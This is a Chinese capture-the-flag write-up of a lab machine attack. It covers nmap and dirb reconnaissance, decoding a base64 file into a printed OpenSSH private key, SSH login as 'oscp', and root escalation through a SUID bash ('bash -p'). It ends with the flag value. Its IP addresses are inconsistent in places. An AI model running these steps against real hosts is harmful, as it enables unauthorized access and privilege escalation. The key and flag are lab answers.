• 写写打靶记录。

主机探测

IP 探测

1
2
3
4
5
6
7
8
9
10
11
C:\Users\Yongz\nmap# nmap -sn 192.168.110.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-25 11:08 中国标准时间
Nmap scan report for 192.168.146.20
Host is up (0.00025s latency).
MAC Address: 00:0C:29:D3:73:91 (VMware)
Nmap scan report for 192.168.146.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E0:72:82 (VMware)
Nmap scan report for 192.168.146.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 21.93 seconds
  • 判断出 192.168.146.147 为靶机 IP 地址。

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root?kali)-[~]
└─# nmap -p- 192.168.110.20
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-05 20:22 EST
Nmap scan report for 192.168.110.20
Host is up (0.000037s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx
MAC Address: 00:50:56:85:53:87 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds

┌──(root㉿kali)-[~]
└─# nmap -p 22,80,33060 -sV 192.168.110.20
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-05 20:24 EST
Nmap scan report for 192.168.110.20
Host is up (0.00012s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version
......
  • 发现一个 SSH 服务与 HTTP 服务,个人习惯先对 HTTP 服务进行测试。

Web 渗透

信息收集

  • 访问对方 HTTP 服务

image-20231111113150998

  • 看了下页面,发现一个提示,显示指定用户:oscp。

目录扫描

  • 我这使用 dirb 来进行:
1
dirb http://192.168.110.20/

image-20231111113156469

  • 发现一个 robots.txt 文件,访问一下:

image-20231111113159786

  • 发现一个 secret.txt 文件,再访问一下:

image-20231111113202756

base64 解密

  • 整个文件以 == 结尾,熟悉的话能看出这个应该是经过 base64 加密的,拿去网站解密一下:

image-20231111113206899

1
2
3
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

SSH 连接

  • 此类样式,其实就可以看得出是 SSH 连接的私钥,结合上面的用户是 oscp,所以接下来进行 SSH 连接。创建一个 id_rsa 文件,将文件权限设置为 600:

注:777 权限会导致报错,若将 id_rsa 文件覆盖,目录下的 id_rsa.pub 也会导致报错。

1
2
3
cd /tmp
vim id_rsa
cat id_rsa

image-20231111113211175

  • 输入以下命令,尝试连接(记得修改文件权限):
1
ssh -i id_rsa oscp@192.168.110.20

image-20231111113214909

  • 成功连接!

Bash 提权

  • 先来进行三问:id、pwd、whoami。
1
2
3
4
5
6
-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
-bash-5.0$ pwd
/home/oscp
-bash-5.0$ whoami
oscp
  • 尝试寻找提权方式:
1
2
3
4
5
6
7
8
9
10
11
# sudo 提权失败,需要密码
-bash-5.0$ sudo -l
[sudo] password for oscp: 
# 查找 SUID 提权
-bash-5.0$ find / -user root -perm -4000 -print 2>/dev/null
......
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
......
  • 发现了 bash,提权试试:
1
/usr/bin/bash -p

image-20231111113219441

  • 提权成功,去查找 flag 文件
1
2
3
4
bash-5.0# find /root -name flag*
/root/flag.txt
bash-5.0# cat /root/flag.txt
d73b04b0e696b0945283defa3eee4538